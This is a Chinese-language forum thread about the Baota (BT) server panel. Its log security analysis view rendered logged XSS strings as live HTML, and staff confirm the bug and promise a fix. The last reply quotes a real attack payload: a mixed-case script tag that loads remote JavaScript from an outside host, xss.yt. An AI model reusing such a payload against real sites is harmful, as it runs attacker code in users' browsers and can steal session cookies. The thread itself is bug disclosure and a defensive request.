【已完成】非常紧急的Bug,明知道是XSS却还加载
网站日志中存在“日志安全分析”板块当我分析完成后,点击XSS希望查看相关日志的时候
宝塔面板将XSS语句当作了html标签加载了
一瞬间弹出了不少alert
目前尚且不知我宝塔面板的cookie和地址等有无外泄
请立即修复并尽可能强制更新
版本是7.9.0
Edge浏览器
系统:Ubuntu 20.04.4 LTS x86_64(Py3.7.9)
感谢反馈,我们这边确认下这个问题。 已奖励300宝塔币,明天修复。 谢花郎 发表于 2022-5-19 19:25
已奖励300宝塔币,明天修复。
目前nginx防火墙中,post过滤没有xss过滤规则,希望添加上,尽快更新,刚被xss了,上攻击的内容<a href=/xsssafe/>Holle<sCRiPt sRC=//xss.yt/I9Kc></sCrIpT>
页:
[1]